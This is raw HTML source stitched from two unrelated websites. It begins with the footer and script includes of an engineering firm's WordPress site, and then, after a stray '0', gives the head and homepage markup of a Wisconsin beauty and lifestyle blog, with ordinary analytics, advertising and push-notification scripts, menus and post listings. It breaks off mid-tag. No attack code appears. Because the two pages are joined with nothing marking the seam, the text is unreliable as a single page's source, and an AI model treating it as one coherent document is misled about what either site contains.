href="mailto:i&#110;&#102;o&#64;&#110;i&#116;&#115;ch&#101;ng.&#99;o&#109;">[email protected]</a></li> </ul> <p>Site by <a rel="nofollow" href="http://www.cdgi.com" target="_blank">Clockwork Design Group, Inc</a></p> </footer> </div> </div><!--//end .container--> </div><!-- //end #page-inner --> </div><!--//end #wrapper--> <script type="text/javascript"> var addthis_config = { services_compact: 'twitter,email,facebook,print,pinterest_share,gmail,google_plusone_share', data_track_clickback: false }; </script> <script type="text/javascript" src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-57c9aeb85ac9223f"></script> <script type='text/javascript'> /* <![CDATA[ */ var wpcf7 = {"apiSettings":{"root":"http:\/\/www.nitscheng.com\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"}}; /* ]]> */ </script> <script type='text/javascript' src='http://www.nitscheng.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1'></script> <script type='text/javascript' src='http://www.nitscheng.com/wp-content/themes/nitscheng/js/hoverIntent.js?ver=1.9.1'></script> <script type='text/javascript' src='http://www.nitscheng.com/wp-content/themes/nitscheng/js/superfish.js?ver=1.7.9'></script> <script type='text/javascript' src='http://www.nitscheng.com/wp-content/themes/nitscheng/js/jquery.flexslider.js?ver=1.0'></script> <script type='text/javascript' src='http://www.nitscheng.com/wp-content/themes/nitscheng/js/jquery.fancybox.pack.js?ver=2.1.5'></script> <script type='text/javascript' src='http://www.nitscheng.com/wp-content/themes/nitscheng/js/jquery.fancybox-media.js?ver=1.0.6'></script> <script type='text/javascript' src='http://www.nitscheng.com/wp-content/themes/nitscheng/js/jquery.matchHeight-min.js?ver=1.0'></script> <script type='text/javascript' src='http://www.nitscheng.com/wp-content/themes/nitscheng/js/jquery.fitvids.js?ver=1.1'></script> <script type='text/javascript' src='http://www.nitscheng.com/wp-content/themes/nitscheng/js/dropkick.min.js?ver=1.0'></script> <script type='text/javascript' src='http://www.nitscheng.com/wp-content/themes/nitscheng/js/custom.js?ver=1.0'></script> <script type='text/javascript' src='http://www.nitscheng.com/wp-content/plugins/page-links-to/js/new-tab.min.js?ver=3.0.0-beta.1'></script> <script type='text/javascript' src='http://www.nitscheng.com/wp-includes/js/wp-embed.min.js?ver=5.2'></script> </body> </html>
0
<!DOCTYPE html><html lang="en-US" prefix="og: http://ogp.me/ns#"><head ><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><link type="text/css" media="all" href="https://jasminemaria.com/wp-content/cache/autoptimize/css/autoptimize_13ba94d073bb2774fdea5d741056dba1.css" rel="stylesheet" /><link type="text/css" media="screen" href="https://jasminemaria.com/wp-content/cache/autoptimize/css/autoptimize_651a1ab0f12e47f3b6dde4326cb4446e.css" rel="stylesheet" /><title>Jasmine Maria - Wisconsin Beauty + Lifestyle Blog</title> <script type="text/javascript">var trackScrolling=true; var trackScrollingPercentage=false; var ScrollingPercentageNumber=25; var stLogInterval=10*1000; var cutOffTime=900; var trackNoEvents=false; var trackNoMaxTime=false;</script> <meta name="description" content="Wisconsin Beauty + Lifestyle Blog"/><link rel="canonical" href="https://jasminemaria.com/" /><link rel="next" href="https://jasminemaria.com/page/2/" /><meta property="og:locale" content="en_US" /><meta property="og:type" content="website" /><meta property="og:title" content="Jasmine Maria - Wisconsin Beauty + Lifestyle Blog" /><meta property="og:description" content="Wisconsin Beauty + Lifestyle Blog" /><meta property="og:url" content="https://jasminemaria.com/" /><meta property="og:site_name" content="Jasmine Maria" /><meta name="twitter:card" content="summary" /><meta name="twitter:description" content="Wisconsin Beauty + Lifestyle Blog" /><meta name="twitter:title" content="Jasmine Maria - Wisconsin Beauty + Lifestyle Blog" /><meta name="twitter:site" content="@thejasminemaria" /> <script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://jasminemaria.com/#website","url":"https://jasminemaria.com/","name":"Jasmine Maria","publisher":{"@id":"https://jasminemaria.com/#person"},"potentialAction":{"@type":"SearchAction","target":"https://jasminemaria.com/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"WebPage","@id":"https://jasminemaria.com/#webpage","url":"https://jasminemaria.com/","inLanguage":"en-US","name":"Jasmine Maria - Wisconsin Beauty + Lifestyle Blog","isPartOf":{"@id":"https://jasminemaria.com/#website"},"about":{"@id":"https://jasminemaria.com/#person"},"description":"Wisconsin Beauty + Lifestyle Blog"}]}</script> <link rel='dns-prefetch' href='//pagead2.googlesyndication.com' /><link rel='dns-prefetch' href='//maxcdn.bootstrapcdn.com' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel='dns-prefetch' href='//k4z6w9b5.stackpathcdn.com' /><link rel='dns-prefetch' href='//cdn.shareaholic.net' /><link rel='dns-prefetch' href='//www.shareaholic.net' /><link rel='dns-prefetch' href='//analytics.shareaholic.com' /><link rel='dns-prefetch' href='//recs.shareaholic.com' /><link rel='dns-prefetch' href='//go.shareaholic.com' /><link rel='dns-prefetch' href='//partner.shareaholic.com' /><link rel="alternate" type="application/rss+xml" title="Jasmine Maria &raquo; Feed" href="https://jasminemaria.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Jasmine Maria &raquo; Comments Feed" href="https://jasminemaria.com/comments/feed/" /><link rel='preload' href='//cdn.shareaholic.net/assets/pub/shareaholic.js' as='script' /> <script data-cfasync='false'>// _SHR_SETTINGS = {"endpoints":{"local_recs_url":"https:\/\/jasminemaria.com\/wp-admin\/admin-ajax.php?action=shareaholic_permalink_related","ajax_url":"https:\/\/jasminemaria.com\/wp-admin\/admin-ajax.php","share_counts_url":"https:\/\/jasminemaria.com\/wp-admin\/admin-ajax.php?action=shareaholic_share_counts_api"}}; //</script> <script data-cfasync='false' src='//cdn.shareaholic.net/assets/pub/shareaholic.js' data-shr-siteid='e5241c450067236f38b41dd80e5d392c' async ></script> <meta name='shareaholic:site_name' content='Jasmine Maria' /><meta name='shareaholic:language' content='en-US' /><meta name='shareaholic:article_visibility' content='private' /><meta name='shareaholic:site_id' content='e5241c450067236f38b41dd80e5d392c' /><meta name='shareaholic:wp_version' content='8.12.6' /><link rel='stylesheet' id='dashicons-css' href='https://jasminemaria.com/wp-includes/css/dashicons.min.css' type='text/css' media='all' /><link rel='stylesheet' id='font-awesome-style-css' href='//maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css' type='text/css' media='all' /><link rel='stylesheet' id='sb-font-awesome-css' href='https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css' type='text/css' media='all' /><link rel='stylesheet' id='tt-easy-google-fonts-css' href='https://fonts.googleapis.com/css?family=%3A&#038;subset=latin%2Call' type='text/css' media='all' /><link rel='stylesheet' id='megamenu-css' href='https://jasminemaria.com/wp-content/cache/autoptimize/css/autoptimize_single_ea29822d589577bb01d6c5096a9ed227.css' type='text/css' media='all' /><link rel='stylesheet' id='ud-fonts-css' href='//fonts.googleapis.com/css?family=Homemade+Apple' type='text/css' media='all' /> <script type='text/javascript' src='https://jasminemaria.com/wp-includes/js/jquery/jquery.js'></script> <script type='text/javascript'>var wpp_params = {"sampling_active":"0","sampling_rate":"100","ajax_url":"https:\/\/jasminemaria.com\/wp-json\/wordpress-popular-posts\/v1\/popular-posts\/","ID":"","token":"92635ae9f8","debug":""};</script> <!--[if lt IE 9]> <script type='text/javascript' src='https://jasminemaria.com/wp-content/themes/genesis/lib/js/html5shiv.min.js'></script> <![endif]--> <script type='text/javascript' async src='https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js'></script> <script type='text/javascript'>(adsbygoogle = window.adsbygoogle || []).push({google_ad_client: "ca-pub-1316027039059812", enable_page_level_ads: true, tag_partner: "genesis"});</script> <link rel='https://api.w.org/' href='https://jasminemaria.com/wp-json/' /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://jasminemaria.com/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://jasminemaria.com/wp-includes/wlwmanifest.xml" /><meta name="generator" content="WordPress 5.2" /> <script type="text/javascript">;(function(p,l,o,w,i,n,g){if(!p[i]){p.GlobalSnowplowNamespace=p.GlobalSnowplowNamespace||[]; p.GlobalSnowplowNamespace.push(i);p[i]=function(){(p[i].q=p[i].q||[]).push(arguments) };p[i].q=p[i].q||[];n=l.createElement(o);g=l.getElementsByTagName(o)[0];n.async=1; n.src=w;g.parentNode.insertBefore(n,g)}}(window,document,"script","//a.tapinfluence.com/tap.js","taptracker")); taptracker('newTracker', 'cf', 'c.tapinfluence.com', {appId: 'a2f38498-55d3-11e5-8543-22000afd2dc7'}); taptracker('crossDomainLinker', function(linkElement) { return true; }); taptracker('trackPageView');</script> <script>(function (m, a, i, l, e, r) { m['MailerLiteObject'] = e; function f() { var c = {a: arguments, q: []}; var r = this.push(c); return "number" != typeof r ? r : f.bind(c.q); } f.q = f.q || []; m[e] = m[e] || f.bind(f.q); m[e].q = m[e].q || f.q; r = a.createElement(i); var _ = a.getElementsByTagName(i)[0]; r.async = 1; r.src = l + '?' + (~~(new Date().getTime() / 10000000)); _.parentNode.insertBefore(r, _); })(window, document, 'script', 'https://static.mailerlite.com/js/universal.js', 'ml'); var ml_account = ml('accounts', '908049', 'e4g4d3w8j7', 'load');</script> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-61163886-1"></script> <script>window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-61163886-1');</script> <meta name="onesignal" content="wordpress-plugin"/><link rel="manifest" href="https://jasminemaria.com/wp-content/plugins/onesignal-free-web-push-notifications/sdk_files/manifest.json.php?gcm_sender_id="/> <script src="https://cdn.onesignal.com/sdks/OneSignalSDK.js" async></script> <script>window.OneSignal = window.OneSignal || []; OneSignal.push( function() { OneSignal.SERVICE_WORKER_UPDATER_PATH = "OneSignalSDKUpdaterWorker.js.php"; OneSignal.SERVICE_WORKER_PATH = "OneSignalSDKWorker.js.php"; OneSignal.SERVICE_WORKER_PARAM = { scope: '/' }; OneSignal.setDefaultNotificationUrl("https://jasminemaria.com"); var oneSignal_options = {}; window._oneSignalInitOptions = oneSignal_options; oneSignal_options['wordpress'] = true; oneSignal_options['appId'] = '6a9fd62f-c65b-45a5-8cf3-fbcfcfe10377'; oneSignal_options['autoRegister'] = false; oneSignal_options['welcomeNotification'] = { }; oneSignal_options['welcomeNotification']['title'] = ""; oneSignal_options['welcomeNotification']['message'] = ""; oneSignal_options['path'] = "https://jasminemaria.com/wp-content/plugins/onesignal-free-web-push-notifications/sdk_files/"; oneSignal_options['promptOptions'] = { }; oneSignal_options['notifyButton'] = { }; oneSignal_options['notifyButton']['enable'] = true; oneSignal_options['notifyButton']['position'] = 'bottom-right'; oneSignal_options['notifyButton']['theme'] = 'default'; oneSignal_options['notifyButton']['size'] = 'medium'; oneSignal_options['notifyButton']['prenotify'] = true; oneSignal_options['notifyButton']['showCredit'] = true; oneSignal_options['notifyButton']['text'] = {}; OneSignal.init(window._oneSignalInitOptions); }); function documentInitOneSignal() { var oneSignal_elements = document.getElementsByClassName("OneSignal-prompt"); var oneSignalLinkClickHandler = function(event) { OneSignal.push(['registerForPushNotifications']); event.preventDefault(); }; for(var i = 0; i < oneSignal_elements.length; i++) oneSignal_elements[i].addEventListener('click', oneSignalLinkClickHandler, false); } if (document.readyState === 'complete') { documentInitOneSignal(); } else { window.addEventListener("load", function(event){ documentInitOneSignal(); }); }</script> <link rel="icon" href="https://jasminemaria.com/wp-content/uploads/2019/01/cropped-favicon-32x32.png" sizes="32x32" /><link rel="icon" href="https://jasminemaria.com/wp-content/uploads/2019/01/cropped-favicon-192x192.png" sizes="192x192" /><link rel="apple-touch-icon-precomposed" href="https://jasminemaria.com/wp-content/uploads/2019/01/cropped-favicon-180x180.png" /><meta name="msapplication-TileImage" content="https://jasminemaria.com/wp-content/uploads/2019/01/cropped-favicon-270x270.png" /></head><body class="home blog mega-menu-primary custom-header header-image header-full-width content-sidebar elementor-default" itemscope itemtype="https://schema.org/WebPage"><div class="site-container"><ul class="genesis-skip-link"><li><a href="#genesis-nav-primary" class="screen-reader-shortcut"> Skip to primary navigation</a></li><li><a href="#genesis-content" class="screen-reader-shortcut"> Skip to content</a></li><li><a href="#genesis-sidebar-primary" class="screen-reader-shortcut"> Skip to primary sidebar</a></li></ul><div class="nav-outer"><div class="nav-inner"><div class="wrap"><div class="nav-left"><section id="minimal-social-icons-6" class="widget minimal-social-icons"><div class="widget-wrap"><ul class="aligncenter"><li class="ssi-instagram"><a href="https://www.instagram.com/thejasminemaria" target="_blank"><i class="fa fa-instagram"></i></a></li><li class="ssi-twitter"><a href="https://www.twitter.com/thejasminemaria" target="_blank"><i class="fa fa-twitter"></i></a></li><li class="ssi-bloglovin"><a href="https://www.bloglovin.com/blogs/jasmine-maria-14935831" target="_blank"><i class="fa fa-heart"></i></a></li><li class="ssi-pinterest"><a href="https://www.pinterest.com/thejasminemaria" target="_blank"><i class="fa fa-pinterest-p"></i></a></li><li class="ssi-facebook"><a href="https://www.facebook.com/thejasminemaria" target="_blank"><i class="fa fa-facebook"></i></a></li></ul></div></section></div><nav class="nav-primary" aria-label="Main" itemscope itemtype="https://schema.org/SiteNavigationElement" id="genesis-nav-primary"><div class="wrap"><div id="mega-menu-wrap-primary" class="mega-menu-wrap"><div class="mega-menu-toggle"><div class="mega-toggle-blocks-left"></div><div class="mega-toggle-blocks-center"></div><div class="mega-toggle-blocks-right"><div class='mega-toggle-block mega-menu-toggle-block mega-toggle-block-1' id='mega-toggle-block-1' tabindex='0'><span class='mega-toggle-label' role='button' aria-expanded='false'><span class='mega-toggle-label-closed'>MENU</span><span class='mega-toggle-label-open'>MENU</span></span></div></div></div><ul id="mega-menu-primary" class="mega-menu max-mega-menu mega-menu-horizontal mega-no-js" data-event="hover_intent" data-effect="fade_up" data-effect-speed="200" data-effect-mobile="disabled" data-effect-speed-mobile="200" data-mobile-force-width="false" data-second-click="close" data-document-click="collapse" data-vertical-behaviour="standard" data-breakpoint="0" data-unbind="true"><li class='mega-menu-item mega-menu-item-type-custom mega-menu-item-object-custom mega-current-menu-item mega-current_page_item mega-menu-item-home mega-align-bottom-left mega-menu-flyout mega-menu-item-10773' id='mega-menu-item-10773'><a class="mega-menu-link" href="https://jasminemaria.com" tabindex="0">Home</a></li><li class='mega-menu-item mega-menu-item-type-post_type mega-menu-item-object-page mega-align-bottom-left mega-menu-flyout mega-menu-item-8655' id='mega-menu-item-8655'><a class="mega-menu-link" href="https://jasminemaria.com/about-madison-beauty-lifestyle-blog/" tabindex="0">About</a></li><li class='mega-menu-item mega-menu-item-type-custom mega-menu-item-object-custom mega-menu-item-has-children mega-menu-megamenu mega-align-bottom-left mega-menu-grid mega-menu-item-10758' id='mega-menu-item-10758'><a class="mega-menu-link" href="#" aria-haspopup="true" aria-expanded="false" tabindex="0">Categories<span class="mega-indicator"></span></a><ul class="mega-sub-menu"><li class='mega-menu-row' id='mega-menu-10758-0'><ul class="mega-sub-menu"><li class='mega-menu-column mega-menu-columns-3-of-12' id='mega-menu-10758-0-0'><ul class="mega-sub-menu"><li class='mega-menu-item mega-menu-item-type-taxonomy mega-menu-item-object-category mega-menu-item-10759' id='mega-menu-item-10759'><a class="mega-menu-link" href="https://jasminemaria.com/category/beauty/">Beauty</a></li><li class='mega-menu-item mega-menu-item-type-taxonomy mega-menu-item-object-category mega-menu-item-12521' id='mega-menu-item-12521'><a target="_blank" class="mega-menu-link" href="https://jasminemaria.com/category/beauty/best-of/">Best Of</a></li><li class='mega-menu-item mega-menu-item-type-taxonomy mega-menu-item-object-category mega-menu-item-10760' id='mega-menu-item-10760'><a class="mega-menu-link" href="https://jasminemaria.com/category/lifestyle/">Lifestyle</a></li><li class='mega-menu-item mega-menu-item-type-taxonomy mega-menu-item-object-category mega-menu-item-10761' id='mega-menu-item-10761'><a class="mega-menu-link" href="https://jasminemaria.com/category/lifestyle/fashion/">Fashion</a></li><li class='mega-menu-item mega-menu-item-type-taxonomy mega-menu-item-object-category mega-menu-item-10762' id='mega-menu-item-10762'><a class="mega-menu-link" href="https://jasminemaria.com/category/lifestyle/wedding/">Wedding</a></li><li class='mega-menu-item mega-menu-item-type-taxonomy mega-menu-item-object-category mega-menu-item-10763' id='mega-menu-item-10763'><a class="mega-menu-link" href="https://jasminemaria.com/category/lifestyle/travel/">Travel</a></li><li class='mega-menu-item mega-menu-item-type-taxonomy mega-menu-item-object-category mega-menu-item-10764' id='mega-menu-item-10764'><a class="mega-menu-link" href="https://jasminemaria.com/category/recipes/">Recipes</a></li></ul></li><li class='mega-menu-column mega-menu-columns-9-of-12' id='mega-menu-10758-0-1'><ul class="mega-sub-menu"><li class='mega-menu-item mega-menu-item-type-widget featured-content featuredpost mega-menu-item-featured-post-48' id='mega-menu-item-featured-post-48'><article class="post-12324 post type-post status-publish format-standard has-post-thumbnail category-beauty category-skincare-products category-sponsored tag-beauty entry"><a href="https://jasminemaria.com/2019/05/dove-shower-foam/" class="aligncenter" aria-hidden="true" tabindex="-1"><img width="300" height="300" src="https://jasminemaria.com/wp-content/uploads/2019/04/Dove-Foam-1-300x300.jpg" class="entry-image attachment-post" alt="Spring Self-Care with Dove Shower Foam" itemprop="image" srcset="https://jasminemaria.com/wp-content/uploads/2019/04/Dove-Foam-1-300x300.jpg 300w, https://jasminemaria.com/wp-content/uploads/2019/04/Dove-Foam-1-500x500.jpg 500w, https://jasminemaria.com/wp-content/uploads/2019/04/Dove-Foam-1-900x900.jpg 900w, https://jasminemaria.com/wp-content/uploads/2019/04/Dove-Foam-1-1600x1600.jpg 1600w" sizes="(max-width: 300px) 100vw, 300px" /></a><header class="entry-header"><h4 class="entry-title" itemprop="headline"><a href="https://jasminemaria.com/2019/05/dove-shower-foam/">Spring Self-Care with Dove Shower Foam</a></h4></header></article><article class="post-12519 post type-post status-publish format-standard has-post-thumbnail category-beauty category-best-of tag-beauty tag-best-of entry"><a href="https://jasminemaria.com/2019/05/best-of-elf-cosmetics/" class="aligncenter" aria-hidden="true" tabindex="-1"><img width="300" height="300" src="https://jasminemaria.com/wp-content/uploads/2019/05/the-best-of-e.l.f.-cosmetics-pin-300x300.jpg" class="entry-image attachment-post" alt="The Best of e.l.f. Cosmetics" itemprop="image" srcset="https://jasminemaria.com/wp-content/uploads/2019/05/the-best-of-e.l.f.-cosmetics-pin-300x300.jpg 300w, https://jasminemaria.com/wp-content/uploads/2019/05/the-best-of-e.l.f.-cosmetics-pin-500x500.jpg 500w" sizes="(max-width: 300px) 100vw, 300px" /></a><header class="entry-header"><h4 class="entry-title" itemprop="headline"><a href="https://jasminemaria.com/2019/05/best-of-elf-cosmetics/">The Best of e.l.f. Cosmetics</a></h4></header></article><article class="post-12411 post type-post status-publish format-standard has-post-thumbnail category-beauty category-fashion category-hair-products tag-beauty tag-fashion tag-hair entry"><a href="https://jasminemaria.com/2019/04/5-go-to-hair-scarf-styles/" class="aligncenter" aria-hidden="true" tabindex="-1"><img width="300" height="300" src="https://jasminemaria.com/wp-content/uploads/2019/04/5-Go-To-Hair-Scarf-Styles2-300x300.jpg" class="entry-image attachment-post" alt="5 Go-To Hair Scarf Styles" itemprop="image" srcset="https://jasminemaria.com/wp-content/uploads/2019/04/5-Go-To-Hair-Scarf-Styles2-300x300.jpg 300w, https://jasminemaria.com/wp-content/uploads/2019/04/5-Go-To-Hair-Scarf-Styles2-500x500.jpg 500w, https://jasminemaria.com/wp-content/uploads/2019/04/5-Go-To-Hair-Scarf-Styles2-900x900.jpg 900w, https://jasminemaria.com/wp-content/uploads/2019/04/5-Go-To-Hair-Scarf-Styles2-1600x1600.jpg 1600w" sizes="(max-width: 300px) 100vw, 300px" /></a><header class="entry-header"><h4 class="entry-title" itemprop="headline"><a href="https://jasminemaria.com/2019/04/5-go-to-hair-scarf-styles/">5 Go-To Hair Scarf Styles</a></h4></header></article></li></ul></li></ul></li><li class='mega-menu-row' id='mega-menu-10758-1'><ul class="mega-sub-menu"><li class='mega-menu-column mega-menu-columns-3-of-12' id='mega-menu-10758-1-0'></li></ul></li></ul></li><li class='mega-menu-item mega-menu-item-type-custom mega-menu-item-object-custom mega-menu-item-has-children mega-align-bottom-left mega-menu-flyout mega-menu-item-12491' id='mega-menu-item-12491'><a class="mega-menu-link" href="#" aria-haspopup="true" aria-expanded="false" tabindex="0">SHOP<span class="mega-indicator"></span></a><ul class="mega-sub-menu"><li class='mega-menu-item mega-menu-item-type-post_type mega-menu-item-object-page mega-menu-item-12492' id='mega-menu-item-12492'><a class="mega-menu-link" href="https://jasminemaria.com/shop-beauty/">Shop Beauty</a></li><li class='mega-menu-item mega-menu-item-type-post_type mega-menu-item-object-page mega-menu-item-11927' id='mega-menu-item-11927'><a class="mega-menu-link" href="https://jasminemaria.com/shop-favorites/">Lifestyle/Fashion</a></li></ul></li><li class='mega-menu-item mega-menu-item-type-post_type mega-menu-item-object-page mega-align-bottom-left mega-menu-flyout mega-menu-item-9840' id='mega-menu-item-9840'><a target="_blank" class="mega-menu-link" href="https://jasminemaria.com/work-with-jasmine-maria-blog/" tabindex="0">Work with Me</a></li><li class='mega-menu-item mega-menu-item-type-custom mega-menu-item-object-custom mega-align-bottom-left mega-menu-flyout mega-menu-item-11771' id='mega-menu-item-11771'><a class="mega-menu-link" href="http://www.makeupbyjasminev.com" tabindex="0">Makeup Services</a></li></ul></div></div></nav><div class="nav-right"><section id="search-30" class="widget widget_search"><div class="widget-wrap"><form class="search-form" itemprop="potentialAction" itemscope itemtype="https://schema.org/SearchAction" method="get" action="https://jasminemaria.com/" role="search"><label class="search-form-label screen-reader-text" for="searchform-5cdd69005a11d3.97858141">Search</label><input class="search-form-input" type="search" itemprop="query-input" name="s" id="searchform-5cdd69005a11d3.97858141" placeholder="Search"><input class="search-form-submit" type="submit" value="&#xf002;"><meta itemprop="target" content="https://jasminemaria.com/?s={s}"></form></div></section></div></div></div></div><header class="site-header" itemscope itemtype="https://schema.org/WPHeader"><div class="wrap"><div class="nav-left"><section id="minimal-social-icons-6" class="widget minimal-social-icons"><div class="widget-wrap"><ul class="aligncenter"><li class="ssi-instagram"><a href="https://www.instagram.com/thejasminemaria" target="_blank"><i class="fa fa-instagram"></i></a></li><li class="ssi-twitter"><a href="https://www.twitter.com/thejasminemaria" target="_blank"><i class="fa fa-twitter"></i></a></li><li class="ssi-bloglovin"><a href="https://www.bloglovin.com/blogs/jasmine-maria-14935831" target="_blank"><i class="fa fa-heart"></i></a></li><li class="ssi-pinterest"><a href="https://www.pinterest.com/thejasminemaria" target="_blank"><i class="fa fa-pinterest-p"></i></a></li><li class="ssi-facebook"><a href="https://www.facebook.com/thejasminemaria" target="_blank"><i class="fa fa-facebook"></i></a></li></ul></div></section></div><div class="title-area"> <a href="https://jasminemaria.com/" rel="home"> <img src="https://jasminemaria.com/wp-content/uploads/2019/02/jm-1.png" width="928" height="319" alt="Jasmine Maria"> </a><h1 class="site-title" itemprop="headline"><a href="https://jasminemaria.com/">Jasmine Maria</a></h1><p class="site-description" itemprop="description">Wisconsin Beauty + Lifestyle Blog</p></div><div class="nav-right"><section id="search-30" class="widget widget_search"><div class="widget-wrap"><form class="search-form" itemprop="potentialAction" itemscope itemtype="https://schema.org/SearchAction" method="get" action="https://jasminemaria.com/" role="search"><label class="search-form-label screen-reader-text" for="searchform-5cdd69005a4e60.40219812">Search</label><input class="search-form-input" type="search" itemprop="query-input" name="s" id="searchform-5cdd69005a4e60.40219812" placeholder="Search"><input class="search-form-submit" type="submit" value="&#xf002;"><meta itemprop="target" content="https://jasminemaria.com/?s={s}"></form></div></section></div></div></header><div class="slider-widget full-width"><div class="ud-slider four-img same-width"><div class="item"> <a href="https://jasminemaria.com/2019/05/quirky-dog-traits-my-dog-has/"><div class="item-img" style="background:url(https://jasminemaria.com/wp-content/uploads/2019/05/1R9C2987-1440x960.jpg)"></div></a><div class="slider-a"><div class="slider-b"><div class="slider-c"><ul class="grid-meta"><li><a href=""></a></li><li><time class="entry-time" itemprop="datePublished" datetime="2019-05-10T05:00:00-05:00">May 10, 2019</time></li></ul><h4 class="post-title"><a href="https://jasminemaria.com/2019/05/quirky-dog-traits-my-dog-has/">Quirky Dog Traits My Dog Has</a></h4></div></div></div></div><div class="item"> <a href="https://jasminemaria.com/2019/05/6-ways-you-can-support-your-blogger-friend/"><div class="item-img" style="background:url(https://jasminemaria.com/wp-content/uploads/2019/05/DSC0335-1440x2160.jpg)"></div></a><div class="slider-a"><div class="slider-b"><div class="slider-c"><ul class="grid-meta"><li><a href=""></a></li><li><time class="entry-time" itemprop="datePublished" datetime="2019-05-08T20:57:06-05:00">May 8, 2019</time></li></ul><h4 class="post-title"><a href="https://jasminemaria.com/2019/05/6-ways-you-can-support-your-blogger-friend/">6 Ways You Can Support Your Blogger Friend</a></h4></div></div></div></div><div class="item"> <a href="https://jasminemaria.com/2019/05/amazon-fashion-haul-under-50/"><div class="item-img" style="background:url(https://jasminemaria.com/wp-content/uploads/2019/05/Photo-Apr-20-11-21-29-PM-1440x2160.jpg)"></div></a><div class="slider-a"><div class="slider-b"><div class="slider-c"><ul class="grid-meta"><li><a href=""></a></li><li><time class="entry-time" itemprop="datePublished" datetime="2019-05-03T05:00:05-05:00">May 3, 2019</time></li></ul><h4 class="post-title"><a href="https://jasminemaria.com/2019/05/amazon-fashion-haul-under-50/">Amazon Fashion Haul under $50</a></h4></div></div></div></div><div class="item"> <a href="https://jasminemaria.com/2019/04/5-go-to-hair-scarf-styles/"><div class="item-img" style="background:url(https://jasminemaria.com/wp-content/uploads/2019/04/5-Go-To-Hair-Scarf-Styles2-1440x1920.jpg)"></div></a><div class="slider-a"><div class="slider-b"><div class="slider-c"><ul class="grid-meta"><li><a href=""></a></li><li><time class="entry-time" itemprop="datePublished" datetime="2019-04-30T05:00:00-05:00">April 30, 2019</time></li></ul><h4 class="post-title"><a href="https://jasminemaria.com/2019/04/5-go-to-hair-scarf-styles/">5 Go-To Hair Scarf Styles</a></h4></div></div></div></div><div class="item"> <a href="https://jasminemaria.com/2019/04/coral-floral-romper/"><div class="item-img" style="background:url(https://jasminemaria.com/wp-content/uploads/2019/04/Floral-Romper-6-1440x2160.jpg)"></div></a><div class="slider-a"><div class="slider-b"><div class="slider-c"><ul class="grid-meta"><li><a href=""></a></li><li><time class="entry-time" itemprop="datePublished" datetime="2019-04-29T05:00:02-05:00">April 29, 2019</time></li></ul><h4 class="post-title"><a href="https://jasminemaria.com/2019/04/coral-floral-romper/">Coral Floral Romper</a></h4></div></div></div></div><div class="item"> <a href="https://jasminemaria.com/2019/04/mothers-day-striped-jumpsuit-under-50/"><div class="item-img" style="background:url(https://jasminemaria.com/wp-content/uploads/2019/04/Mothers-Day-Outfit4-1440x2160.jpg)"></div></a><div class="slider-a"><div class="slider-b"><div class="slider-c"><ul class="grid-meta"><li><a href=""></a></li><li><time class="entry-time" itemprop="datePublished" datetime="2019-04-22T08:06:25-05:00">April 22, 2019</time></li></ul><h4 class="post-title"><a href="https://jasminemaria.com/2019/04/mothers-day-striped-jumpsuit-under-50/">Mother&#8217;s Day Striped Jumpsuit Under $50</a></h4></div></div></div></div><div class="item"> <a href="https://jasminemaria.com/2019/03/gordmas-x-thredup/"><div class="item-img" style="background:url(https://jasminemaria.com/wp-content/uploads/2019/03/ThredUp-x-Gordmans6-1440x1920.jpg)"></div></a><div class="slider-a"><div class="slider-b"><div class="slider-c"><ul class="grid-meta"><li><a href=""></a></li><li><time class="entry-time" itemprop="datePublished" datetime="2019-03-29T05:00:00-05:00">March 29, 2019</time></li></ul><h4 class="post-title"><a href="https://jasminemaria.com/2019/03/gordmas-x-thredup/">Gordmans x ThredUp</a></h4></div></div></div></div></div></div><div class="homepage-two homepage-widgets"><div class="wrap"><section id="custom_html-45" class="widget_text widget widget_custom_html"><div class="widget_text widget-wrap"><h4 class="widget-title widgettitle">Current Favorites</h4><div class="textwidget custom-html-widget"><div class="shopthepost-widget" data-widget-id="3565598"><script type="text/javascript">!function(d,s,id){var e, p = /^http:/.test(d.location) ? 'http' : 'https';if(!d.getElementById(id)) {e = d.createElement(s);e.id = id;e.src = p + '://' + 'widgets.rewardstyle.com' + '/js/shopthepost.js';d.body.appendChild(e);}if(typeof window.__stp === 'object') if(d.readyState === 'complete') {window.__stp.init();}}(document, 'script', 'shopthepost-script');</script><div class="rs-adblock"><img src="//assets.rewardstyle.com/production/72b37c403802c69fbd42b1c00ddf2bda9965f48a/images/search/350.gif" onerror="this.parentNode.innerHTML='Disable your ad blocking software to view this content.'" style="width: 15px; height: 15px;" /><noscript>JavaScript is currently disabled in this browser. Reactivate it to view this content.</noscript></div></div></div></div></section><section id="wpp-2" class="widget popular-posts"><div class="widget-wrap"><h4 class="widget-title widgettitle">Popular Posts</h4><ul class="wpp-list wpp-list-with-thumbnails"><li> <a href="https://jasminemaria.com/2018/02/ride-or-die-drugstore-makeup/" title="Ride or Die: Drugstore Makeup" target="_self"><img src="https://jasminemaria.com/wp-content/uploads/wordpress-popular-posts/7222-featured-500x500.png" width="500" height="500" alt="Ride or Die: Drugstore Makeup" class="wpp-thumbnail wpp_cached_thumb wpp_featured" /></a> <a href="https://jasminemaria.com/2018/02/ride-or-die-drugstore-makeup/" title="Ride or Die: Drugstore Makeup" class="wpp-post-title" target="_self">Ride or Die: Drugstore Makeup</a></li><li> <a href="https://jasminemaria.com/2019/04/covergirl-ascension-palette/" title="Smokey Spring Eye Look with COVERGIRL Ascension Palette" target="_self"><img src="https://jasminemaria.com/wp-content/uploads/wordpress-popular-posts/12357-featured-500x500.jpg" width="500" height="500" alt="Smokey Spring Eye Look with COVERGIRL Ascension Palette" class="wpp-thumbnail 